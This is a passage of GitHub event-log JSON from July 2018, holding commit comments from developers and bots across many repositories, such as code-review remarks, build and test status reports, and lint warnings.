modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-23T21:44:57Z"}
{"id":"8006613147","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29806357,"position":14,"line":41,"path":"src/Renderer.java","commit_id":"1f15ce843e6c15007bd699499d456d004d8d1e25","created_at":"2018-07-23T21:46:59Z","updated_at":"2018-07-23T21:46:59Z","author_association":"CONTRIBUTOR","body":"Resizing the window would actually be pretty nice"}},"created_at":"2018-07-23T21:46:59Z"}
{"id":"8006616537","type":"CommitCommentEvent","actor":{"login":"cervols"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29806364,"position":42,"line":39,"path":"part2/right_triangle.rb","commit_id":"2a09ccbe90a888ffb6ff4edd0e5424ad47174cf6","created_at":"2018-07-23T21:47:50Z","updated_at":"2018-07-23T21:47:50Z","author_association":"OWNER","body":"в массиве sides остались 2 меньшие стороны треугольника (после sides.sort!.pop) :)"}},"created_at":"2018-07-23T21:47:50Z"}
{"id":"8006616943","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29806365,"position":2,"line":1,"path":"condarecipe9.2/bld.bat","commit_id":"5eb39fed28d62fa217c1ecc5827614916665b7cc","created_at":"2018-07-23T21:47:56Z","updated_at":"2018-07-23T21:47:56Z","author_association":"NONE","body":"Yeah, but I think it is now."}},"created_at":"2018-07-23T21:47:56Z"}
{"id":"8006617951","type":"CommitCommentEvent","actor":{"login":"matteo-esposito"},"repo":{"name":"matteo-esposito/C248"},"payload":{"comment":{"id":29806369,"position":10,"line":5,"path":"README.md","commit_id":"c70347c5986001c809e5af840b33d4e4a829422b","created_at":"2018-07-23T21:48:10Z","updated_at":"2018-07-23T21:48:10Z","author_association":"OWNER","body":"Nice HTML skills."}},"created_at":"2018-07-23T21:48:10Z"}
{"id":"8006619014","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29806373,"position":null,"line":null,"path":null,"commit_id":"835f9bf66deddf8260fc0acb4fac3f02729c403d","created_at":"2018-07-23T21:48:26Z","updated_at":"2018-07-23T21:48:26Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/835f9bf66deddf8260fc0acb4fac3f02729c403d/index.html"}},"created_at":"2018-07-23T21:48:26Z"}
{"id":"8006619194","type":"CommitCommentEvent","actor":{"login":"RSImarketing"},"repo":{"name":"RSImarketing/rsi-national-sales-meeting"},"payload":{"comment":{"id":29806375,"position":null,"line":null,"path":null,"commit_id":"3fbad698b48466ef4347c4db0f4c479eb9058649","created_at":"2018-07-23T21:48:28Z","updated_at":"2018-07-23T21:48:28Z","author_association":"OWNER","body":"Trying this again"}},"created_at":"2018-07-23T21:48:28Z"}
{"id":"8006619659","type":"CommitCommentEvent","actor":{"login":"alleymae"},"repo":{"name":"chrisalley/react-word-counter"},"payload":{"comment":{"id":29806377,"position":null,"line":null,"path":null,"commit_id":"cf438b68fd9bb7d6119e4b9fa1a58afb93c9fb48","created_at":"2018-07-23T21:48:35Z","updated_at":"2018-07-23T21:48:35Z","author_association":"NONE","body":"On Jul 23, 2018 12:24 AM, \"alleymae\" <notifications@github.com> wrote:\n\nHiser\n\nGuess who\n\n\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub\n<https://github.com/chrisalley/react-word-counter/commit/cf438b68fd9bb7d6119e4b9fa1a58afb93c9fb48#commitcomment-29795622>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/AnoAMXtTLelPb2rEDC7-baop1cKOVy7Qks5uJVAGgaJpZM4VaV9Q>\n.\n"}},"created_at":"2018-07-23T21:48:35Z"}
{"id":"8006627944","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29806385,"position":3,"line":2,"path":"condarecipe9.2/build.sh","commit_id":"69bcf6d1130aef4c86f3977452d5c9da4f22a065","created_at":"2018-07-23T21:50:32Z","updated_at":"2018-07-23T21:50:32Z","author_association":"NONE","body":"hmm I think you still need that file, to install `cudatoolkit-dev-post-install.py`, but I guess that you could do that in the build.sh and bld.bat scripts."}},"created_at":"2018-07-23T21:50:32Z"}
{"id":"8006628184","type":"CommitCommentEvent","actor":{"login":"owocki"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29806386,"position":13,"line":905,"path":"app/dashboard/models.py","commit_id":"40294511f3c12ef1d03f24d67bd0899e3eec51cb","created_at":"2018-07-23T21:50:36Z","updated_at":"2018-07-23T21:50:36Z","author_association":"MEMBER","body":"probably `amount_in_whole_units` since wei is an ETH specific unit of account"}},"created_at":"2018-07-23T21:50:36Z"}
{"id":"8006634893","type":"CommitCommentEvent","actor":{"login":"IKnewOne"},"repo":{"name":"Ludeon/RimWorld-ru"},"payload":{"comment":{"id":29806403,"position":81,"line":5444,"path":"Backstories/Backstories.xml","commit_id":"0531926602dc4454ef58d787c085452fafba939d","created_at":"2018-07-23T21:52:10Z","updated_at":"2018-07-23T21:52:10Z","author_association":"CONTRIBUTOR","body":"Him"}},"created_at":"2018-07-23T21:52:10Z"}
{"id":"8006644606","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29806421,"position":null,"line":null,"path":null,"commit_id":"d183e037185d67d01a2c21a5bb3fa0c4cca98d4d","created_at":"2018-07-23T21:54:27Z","updated_at":"2018-07-23T21:54:27Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-44](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-44-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-23T21:54:27Z"}
{"id":"8006644977","type":"CommitCommentEvent","actor":{"login":"vikmeup"},"repo":{"name":"TrustWallet/trust-wallet-ios"},"payload":{"comment":{"id":29806422,"position":22,"line":121,"path":"Trust/Tokens/ViewModels/TokensViewModel.swift","commit_id":"7241cc073339303ca4b9bd2756fcda2a1a1f508a","created_at":"2018-07-23T21:54:32Z","updated_at":"2018-07-23T21:54:32Z","author_association":"MEMBER","body":"never use `eip55String`. Just use `description`"}},"created_at":"2018-07-23T21:54:32Z"}
{"id":"8006648032","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29806439,"position":26,"line":26,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"d88738bb23362722400a6d0d85f8592f11574e40","created_at":"2018-07-23T21:55:19Z","updated_at":"2018-07-23T21:55:19Z","author_association":"NONE","body":"Usually the problem is about the directory isn't a git repository."}},"created_at":"2018-07-23T21:55:19Z"}
{"id":"8006649856","type":"CommitCommentEvent","actor":{"login":"mikofski"},"repo":{"name":"SunPower/PVMismatch"},"payload":{"comment":{"id":29806442,"position":5,"line":37,"path":"pvmismatch/pvmismatch_lib/pvcell.py","commit_id":"f999afdcaadb0e238875b74d1762333c335c2c4c","created_at":"2018-07-23T21:55:44Z","updated_at":"2018-07-23T21:55:44Z","author_association":"CONTRIBUTOR","body":"shouldn't it say \"at reference temperature\" ?"}},"created_at":"2018-07-23T21:55:44Z"}
{"id":"8006650445","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29806444,"position":null,"line":null,"path":null,"commit_id":"832c04c5b5f83ba77d1077bcef1cfc2241f2ed39","created_at":"2018-07-23T21:55:52Z","updated_at":"2018-07-23T21:55:52Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2944 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.04%25-red.png)</a> \n"}},"created_at":"2018-07-23T21:55:52Z"}
{"id":"8006650738","type":"CommitCommentEvent","actor":{"login":"vikmeup"},"repo":{"name":"TrustWallet/trust-wallet-ios"},"payload":{"comment":{"id":29806446,"position":5,"line":151,"path":"Trust/Transfer/ViewModels/SendViewModel.swift","commit_id":"7241cc073339303ca4b9bd2756fcda2a1a1f508a","created_at":"2018-07-23T21:55:56Z","updated_at":"2018-07-23T21:55:56Z","author_association":"MEMBER","body":"Can you reuse the logic for `currentPairPrice` and  `isFiatViewHidden `?"}},"created_at":"2018-07-23T21:55:56Z"}
{"id":"8006651112","type":"CommitCommentEvent","actor":{"login":"xjosh3129"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29806449,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T21:56:02Z","updated_at":"2018-07-23T21:56:02Z","author_association":"NONE","body":"this is great platform..im looking forward working into the project"}},"created_at":"2018-07-23T21:56:02Z"}
{"id":"8006655409","type":"CommitCommentEvent","actor":{"login":"SpiralP"},"repo":{"name":"Metastruct/copas"},"payload":{"comment":{"id":29806459,"position":null,"line":null,"path":null,"commit_id":"25e4c0a4aed621619f47a5112d1e437584b7c1ad","created_at":"2018-07-23T21:57:04Z","updated_at":"2018-07-23T21:57:04Z","author_association":"NONE","body":"https://github.com/Metastruct/issues/issues/284"}},"created_at":"2018-07-23T21:57:04Z"}
{"id":"8006662750","type":"CommitCommentEvent","actor":{"login":"ThatBogan1"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":29806469,"position":1,"line":103,"path":"src/docs/build-configuration.md","commit_id":"7efbd134d0b64d22f2673d66f23602e40a2c22ef","created_at":"2018-07-23T21:58:52Z","updated_at":"2018-07-23T21:58:52Z","author_association":"NONE","body":"https://bitbucket.org/!api/2.0/snippets/[bitbucket_user]/[snippet_id]/master/files/[file_name]`\r\n"}},"created_at":"2018-07-23T21:58:52Z"}
{"id":"8006662856","type":"CommitCommentEvent","actor":{"login":"mattselden12"},"repo":{"name":"mattselden12/finterest"},"payload":{"comment":{"id":29806470,"position":null,"line":null,"path":null,"commit_id":"66fe3350cc9e235064bbb110cd94b78b731acda1","created_at":"2018-07-23T21:58:54Z","updated_at":"2018-07-23T21:58:54Z","author_association":"OWNER","body":"no problems."}},"created_at":"2018-07-23T21:58:54Z"}
{"id":"8006669250","type":"CommitCommentEvent","actor":{"login":"SCratORS"},"repo":{"name":"SCratORS/FlashBlinkService"},"payload":{"comment":{"id":29806483,"position":null,"line":null,"path":null,"commit_id":"7c7cec8ffb9c9d3dd1a0da9c6fd1dd5717ace406","created_at":"2018-07-23T22:00:26Z","updated_at":"2018-07-23T22:00:26Z","author_association":"OWNER","body":"Optimization code"}},"created_at":"2018-07-23T22:00:26Z"}
{"id":"8006671838","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29806489,"position":null,"line":null,"path":null,"commit_id":"adaa7e07f07459d5b2779c781e7086b3bba8c55a","created_at":"2018-07-23T22:01:00Z","updated_at":"2018-07-23T22:01:00Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/adaa7e07f07459d5b2779c781e7086b3bba8c55a/index.html"}},"created_at":"2018-07-23T22:01:00Z"}
{"id":"8006674706","type":"CommitCommentEvent","actor":{"login":"gerritbruening"},"repo":{"name":"faustedition/faust-gen-html"},"payload":{"comment":{"id":29806490,"position":null,"line":null,"path":null,"commit_id":"1dbde5c57cdeb1f7946fc643686e63c8faea2fa7","created_at":"2018-07-23T22:01:39Z","updated_at":"2018-07-23T22:01:39Z","author_association":"CONTRIBUTOR","body":"Sorry, wrong issue.\r\nWhat I meant was https://github.com/faustedition/xml/issues/383"}},"created_at":"2018-07-23T22:01:39Z"}
{"id":"8006678158","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29806499,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T22:02:29Z","updated_at":"2018-07-23T22:02:29Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2986 of 2986 tests passed, 627 test warnings)\n\nMessages:\n\n * 627 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-23T22:02:29Z"}
{"id":"8006679562","type":"CommitCommentEvent","actor":{"login":"mikofski"},"repo":{"name":"SunPower/PVMismatch"},"payload":{"comment":{"id":29806503,"position":21,"line":111,"path":"pvmismatch/pvmismatch_lib/pvsystem.py","commit_id":"4943742f68a1819d258bf930d89c4b05f06b7630","created_at":"2018-07-23T22:02:50Z","updated_at":"2018-07-23T22:02:50Z","author_association":"CONTRIBUTOR","body":"@chetan201 should we check here if interpolated `Pmp` is actually greater than the value of `Psys[mpp]`? For the example in #84 the difference between `max(Psys)` and `Pmp` is 1.17[W] or 0.33%., maybe it's too small to worry over?"}},"created_at":"2018-07-23T22:02:50Z"}
{"id":"8006685400","type":"CommitCommentEvent","actor":{"login":"tatsuo98se"},"repo":{"name":"tatsuo98se/3d_led_cube2"},"payload":{"comment":{"id":29806510,"position":null,"line":null,"path":null,"commit_id":"4c2e4ac0ce3521a769353de306a499f7467d75e2","created_at":"2018-07-23T22:04:16Z","updated_at":"2018-07-23T22:04:16Z","author_association":"OWNER","body":"音声再生命令のPostに失敗しちゃう場合が出て来そうなんだけど、大丈夫？"}},"created_at":"2018-07-23T22:04:16Z"}
{"id":"8006686891","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29806513,"position":null,"line":null,"path":null,"commit_id":"eb5966737a32dca8f36d2c064802bb710e492fd8","created_at":"2018-07-23T22:04:37Z","updated_at":"2018-07-23T22:04:37Z","author_association":"NONE","body":"almoust working! \r\n\r\n\"Find out what accesses this address\" it detects\r\nbut \"Find out what writes this address\" it not detecting \r\n\r\n![image](https://user-images.githubusercontent.com/16543239/43105317-18a98738-8edd-11e8-84ee-6783ec595e44.png)\r\n\r\n![image](https://user-images.githubusercontent.com/16543239/43105418-7d4ce0fe-8edd-11e8-8234-772326e5b965.png)\r\n"}},"created_at":"2018-07-23T22:04:37Z"}
{"id":"8006698849","type":"CommitCommentEvent","actor":{"login":"AndersonQPontes"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29806532,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T22:07:39Z","updated_at":"2018-07-23T22:07:39Z","author_association":"NONE","body":"Very good!!!"}},"created_at":"2018-07-23T22:07:39Z"}
{"id":"8006702711","type":"CommitCommentEvent","actor":{"login":"danielriodejaneiro"},"repo":{"name":"danielriodejaneiro/psychic-memory"},"payload":{"comment":{"id":29806539,"position":null,"line":null,"path":null,"commit_id":"a31b2e5321a42b713ab29bb52ad0daf36f7004b1","created_at":"2018-07-23T22:08:42Z","updated_at":"2018-07-23T22:08:42Z","author_association":"OWNER","body":"It seems this is a breaking change (major release). But what does it actually break? This code? Someone else's?"}},"created_at":"2018-07-23T22:08:42Z"}
{"id":"8006705110","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29806547,"position":null,"line":null,"path":null,"commit_id":"c1868b2ba8a444a39fb2fda533b2c3760d17ea66","created_at":"2018-07-23T22:09:19Z","updated_at":"2018-07-23T22:09:19Z","author_association":"CONTRIBUTOR","body":"https://forums.lanik.us/viewtopic.php?p=132506#p132506"}},"created_at":"2018-07-23T22:09:19Z"}
{"id":"8006707146","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29806555,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T22:09:52Z","updated_at":"2018-07-23T22:09:52Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-23T22:09:52Z"}
{"id":"8006707477","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29806556,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-23T22:09:57Z","updated_at":"2018-07-23T22:09:57Z","author_association":"NONE","body":"Here you can race with ProcessCacheEntry and potentially pass a null `addr` to callback. Race happens when `lock` at the beginning of this function is acquired right after `lock` is released inside `if (!c.callbacks.empty() || c.resolved_at + opt_.dns_cache_refresh_period <= now)`."}},"created_at":"2018-07-23T22:09:57Z"}
{"id":"8006718972","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29806584,"position":null,"line":null,"path":null,"commit_id":"ca05e8d45e5628105bfd41136f4126093bfc1094","created_at":"2018-07-23T22:13:03Z","updated_at":"2018-07-23T22:13:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-983](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-983).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-983-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T22:13:03Z"}
{"id":"8006735556","type":"CommitCommentEvent","actor":{"login":"semoro"},"repo":{"name":"tiembo/dokka"},"payload":{"comment":{"id":29806614,"position":33,"line":742,"path":"core/src/main/kotlin/Formats/DacHtmlFormat.kt","commit_id":"33e649e829febf659eeb86230c05c30ecebd65b8","created_at":"2018-07-23T22:17:31Z","updated_at":"2018-07-23T22:17:31Z","author_association":"NONE","body":"Please, remove whitespace before dot"}},"created_at":"2018-07-23T22:17:31Z"}
{"id":"8006736477","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806615,"position":17,"line":17,"path":"Lesson_2/1.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:17:47Z","updated_at":"2018-07-23T22:17:47Z","author_association":"NONE","body":"Чтобы вывоить числа, массивы, хеши и т.п. через puts, не надо использовать интерполяцию, данные будут преобразованы в строку автоматически"}},"created_at":"2018-07-23T22:17:47Z"}
{"id":"8006737074","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29806617,"position":14,"line":14,"path":"epoll.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-23T22:17:58Z","updated_at":"2018-07-23T22:17:58Z","author_association":"NONE","body":"Don't you want to pass `EPOLL_CLOEXEC` to `epoll_create1`?"}},"created_at":"2018-07-23T22:17:58Z"}
{"id":"8006740013","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806621,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:18:46Z","updated_at":"2018-07-23T22:18:46Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n\n"}},"created_at":"2018-07-23T22:18:46Z"}
{"id":"8006744799","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806624,"position":16,"line":16,"path":"Lesson_2/1.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:20:09Z","updated_at":"2018-07-23T22:20:09Z","author_association":"NONE","body":"В случаях, когда блоки однострочные и не слишком длинные - их принято писать одной строкой через {}\r\n```\r\nmonth.each { |month, day| puts ... }\r\n```"}},"created_at":"2018-07-23T22:20:09Z"}
{"id":"8006746811","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29806630,"position":4,"line":6,"path":"code/drasil-example/Drasil/GamePhysics/Body.hs","commit_id":"7b209a26d9baee132ecd7e891c6063fe7b1fd6ec","created_at":"2018-07-23T22:20:44Z","updated_at":"2018-07-23T22:20:44Z","author_association":"COLLABORATOR","body":"Changes have been made in b7dd8d25df6c7d8cd9b596dfc62c0e3c17da1038 and 6737187dc88a771334ed10cd460b979b2080062d."}},"created_at":"2018-07-23T22:20:44Z"}
{"id":"8006747284","type":"CommitCommentEvent","actor":{"login":"sbx320"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29806632,"position":null,"line":null,"path":null,"commit_id":"da746a5c67e07cc83f31eabf4143522279fb0eac","created_at":"2018-07-23T22:20:52Z","updated_at":"2018-07-23T22:20:52Z","author_association":"MEMBER","body":"Is vswhere actually needed anymore, since it is now a part of the VS2017 installer?"}},"created_at":"2018-07-23T22:20:52Z"}
{"id":"8006747607","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806636,"position":13,"line":13,"path":"Lesson_2/1.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:20:57Z","updated_at":"2018-07-23T22:20:57Z","author_association":"NONE","body":"только ключи должны быть проиндентированны на 2 пробела, а не на 4"}},"created_at":"2018-07-23T22:20:57Z"}
{"id":"8006748454","type":"CommitCommentEvent","actor":{"login":"semoro"},"repo":{"name":"tiembo/dokka"},"payload":{"comment":{"id":29806639,"position":4,"line":710,"path":"core/src/main/kotlin/Formats/DacHtmlFormat.kt","commit_id":"33e649e829febf659eeb86230c05c30ecebd65b8","created_at":"2018-07-23T22:21:09Z","updated_at":"2018-07-23T22:21:09Z","author_association":"NONE","body":"Isn't it better to sort inheritors at the origin in `org.jetbrains.dokka.Formats.JavaLayoutHtmlFormatOutputBuilder.Page.ClassPage`"}},"created_at":"2018-07-23T22:21:09Z"}
{"id":"8006748966","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29806640,"position":13,"line":90,"path":"code/drasil-example/Drasil/NoPCM/Body.hs","commit_id":"7b209a26d9baee132ecd7e891c6063fe7b1fd6ec","created_at":"2018-07-23T22:21:17Z","updated_at":"2018-07-23T22:21:17Z","author_association":"COLLABORATOR","body":"Changes have been made in b7dd8d25df6c7d8cd9b596dfc62c0e3c17da1038 and 6737187dc88a771334ed10cd460b979b2080062d."}},"created_at":"2018-07-23T22:21:17Z"}
{"id":"8006750577","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"ergo720/Cxbx-Reloaded"},"payload":{"comment":{"id":29806644,"position":16,"line":null,"path":"src/CxbxKrnl/CxbxKrnl.cpp","commit_id":"a70aab8fa600b13fb00646f1a642c4b235b4ac54","created_at":"2018-07-23T22:21:42Z","updated_at":"2018-07-23T22:21:42Z","author_association":"NONE","body":"Who's going to restart CxbxKrnlInterruptThread once this while loop exists and interrupts are restored?"}},"created_at":"2018-07-23T22:21:42Z"}
{"id":"8006778135","type":"CommitCommentEvent","actor":{"login":"wohali"},"repo":{"name":"apache/couchdb"},"payload":{"comment":{"id":29806710,"position":null,"line":null,"path":null,"commit_id":"8e0e8b3dda1b152589bd5b8909d3489d3b733b02","created_at":"2018-07-23T22:29:30Z","updated_at":"2018-07-23T22:29:30Z","author_association":"MEMBER","body":"@redgeoff fyi there is no top-level `/_stats` endpoint, as you know in 2.x - it's at `/_node/<nodename>|_local/_stats` :) But point taken."}},"created_at":"2018-07-23T22:29:30Z"}
{"id":"8006778392","type":"CommitCommentEvent","actor":{"login":"EinfachAlex"},"repo":{"name":"BigBotNetwork/V-Bucks"},"payload":{"comment":{"id":29806712,"position":null,"line":null,"path":null,"commit_id":"5af7872b2048eb1a127257301b8869951b52a0ae","created_at":"2018-07-23T22:29:34Z","updated_at":"2018-07-23T22:29:34Z","author_association":"NONE","body":"Wtf"}},"created_at":"2018-07-23T22:29:34Z"}
{"id":"8006778398","type":"CommitCommentEvent","actor":{"login":"cdnkvdbjjkdbnkzsdsdkdhsdsjdshod"},"repo":{"name":"cdnkvdbjjkdbnkzsdsdkdhsdsjdshod/axmkxnanasalknaljlknakslaslalalksajsakl"},"payload":{"comment":{"id":29806713,"position":30,"line":404,"path":"bot.js","commit_id":"9aabe32ec53febbfd1a69ce0e27439801511984c","created_at":"2018-07-23T22:29:34Z","updated_at":"2018-07-23T22:29:34Z","author_association":"OWNER","body":"س"}},"created_at":"2018-07-23T22:29:34Z"}
{"id":"8006779010","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29806715,"position":null,"line":null,"path":null,"commit_id":"b47e30f6734bf35b09159775f1ff8a09a9b5e892","created_at":"2018-07-23T22:29:45Z","updated_at":"2018-07-23T22:29:45Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   